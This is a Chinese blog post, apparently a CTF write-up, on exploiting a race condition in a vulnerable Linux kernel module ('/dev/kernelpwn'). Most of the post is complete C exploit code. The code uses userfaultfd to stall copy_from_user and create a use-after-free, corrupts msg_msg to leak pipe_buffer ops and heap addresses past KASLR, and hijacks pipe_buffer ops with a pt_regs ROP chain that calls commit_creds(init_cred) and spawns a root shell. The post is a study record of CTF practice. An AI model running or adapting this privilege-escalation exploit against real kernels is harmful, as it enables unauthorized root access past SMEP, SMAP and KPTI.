这周在疯狂学kernel pwn。
记录一下这题,race conditon+msg_msg+pipe_buffer,kaslr+smep+smap+kpti。
漏洞很简单,所有操作都没加锁,就是race condition了。edit什么的都只能2次。
很明显了,一次泄露基址,一次劫持控制流。
这种板子就是UAF,在edit中copy_from_user的时候释放,然后再分配相同cache的结构体,就能篡改那个结构体了。题目中的是kmalloc-1k。很明显了,用UAF修改msg_msg的m_ts字段来越界读。
看一下slub的情况,没有开random_freelist。而且我们分配的object就在第一个,很整齐啊。这就想到了同样为kmalloc-1k的pipe buffer,可以越界读pipe buffer的op表,这是个全局变量,读出这个就能根据偏移计算出kbase了。
现在开始考虑怎么劫持控制流来提权。很明显也只能是pipe_buffer,第二次UAF篡改pipe_buffer的op表,现在问题来了。由于开启了smap,我们不能在用户空间伪造op表了,只能在内核空间。我们分配的object都是任由我们写的,看到在这儿伪造。
那么怎么知道object的地址呢?很明显,之前说了,没有看ramdom_freelist,我们可以把msg_msg的m_ts改大一点,顺便泄露下一个object的next指针,就能知道堆的地址啦。
注意,这道题中object的next指针不在0x0的位置,在很里面,最好msg_rcv后全都打印出来,别数了,容易数错。
最后我是打pt_regs来提权的,因为一下子找不到好的gadget来栈迁移,应该要找类似于"mov rsi,rsp",一下子没找到。
以下是代码:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <stdint.h>
int pipefd[2];
int hijack[2];
size_t init_cred;
size_t commit_creds;
size_t pop_rdi;
size_t heap_addr;
size_t add_rsp;
size_t restore;
struct list_head {
uint64_t next;
uint64_t prev;
};
struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};
struct msg_msgseg {
uint64_t next;
};
/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/
int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}
/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}
/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}
void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}
size_t prepare_kernel_cred=NULL;
size_t commit_creds=NULL;
size_t user_cs, user_ss, user_rflags, user_sp;
int fd;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}
void err_exit(char *msg)
{
perror(msg);
sleep(2);
exit(EXIT_FAILURE);
}
void getRootPrivilige(void)
{
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
void get_shell(){
system("/bin/sh");
}
struct Node{
size_t idx;
size_t size;
char* buf;
};
void del(size_t idx){
ioctl(fd,48,&idx);
}
void edit(size_t idx,size_t buf,size_t size){
struct Node node={idx,size,buf};
ioctl(fd,80,&node);
}
void add(size_t buf){
struct Node node={.size=buf};
ioctl(fd,32,&node);
}
void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) perror("[X] ioctl-UFFDIO_API"), exit(-1);
uffdio_register.range.start = (long long)addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) perror("[X] ioctl-UFFDIO_REGISTER"), exit(-1);
if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}
char mg[800];
char copy_src[0x1000];
size_t qu=0;
void* handler0(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler0");
memset(mg,'A',800);
pipe(pipefd);
write(pipefd[1],"haoqiguai\x00",10);
puts("[+] pipe end");
qu=get_msg_queue();
del(0);
write_msg(qu, mg, 800, 1);
size_t cpy[5];
cpy[0]=0;
cpy[1]=0;
cpy[2]=1;
cpy[3]=3000;
cpy[4]=0;
memcpy(copy_src,cpy,0x28);
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
void* handler1(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler1");
del(0);
pipe(hijack);
write(hijack[1],"haoqiguai\x00",10);
size_t ch[3];
ch[0]=0;
ch[1]=add_rsp;
ch[2]=heap_addr;
memcpy(copy_src,ch,0x18);
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
char *uffd_buf0, *uffd_buf1;
pthread_t thr0, thr1;
int main(){
//save_status();
bind_core(0);
fd=open("/dev/kernelpwn",2);
char buf[1024]={0};
add(buf);
uffd_buf0 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
uffd_buf1 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (uffd_buf0 == MAP_FAILED || uffd_buf1 == MAP_FAILED) err_exit("mmap for uffd");
register_userfaultfd(&thr0, uffd_buf0, 0x1000, handler0);
register_userfaultfd(&thr1, uffd_buf1, 0x1000, handler1);
puts("[+] start to leak kernel base and heap addr");
edit(0,uffd_buf0,0x28);
size_t leak[250]={0};
peek_msg(qu,leak,3000,0);
size_t ops=leak[125];
int j=0;
heap_addr=leak[315];
heap_addr-=0x400;
printf("heap_adde:%lx\n",heap_addr);
printf("pipe_buffer ops:%lx\n",ops);
size_t kernel_base=ops-0x203ed80;
printf("kernel_base:%lx\n",kernel_base);
init_cred=kernel_base+0x2a6b700;
commit_creds=kernel_base+0x10c9540;
pop_rdi=kernel_base+0x108c420;
restore=kernel_base+0x1c00fb0+14;
add_rsp=kernel_base+0x10546aa;//add rsp, 0x148; pop r12; pop rbp; ret;
add(buf);
edit(0,uffd_buf1,0x18);
close(hijack[0]);
__asm__(
"mov r15,0xdeadbeef;"
"mov r14,pop_rdi;"
"mov r13,init_cred;"
"mov r12,commit_creds;"
"mov rbp,restore;"
);
close(hijack[1]);
system("/bin/sh");
return 0;
}对了,打pt_regs的add rsp的gadget推荐用ropper找,ROPgadget 找不出来。
![[STM32] 简单介绍 (一)](https://i-blog.csdnimg.cn/direct/60abdf49da5745b381c39d3f6b54d4ee.png)
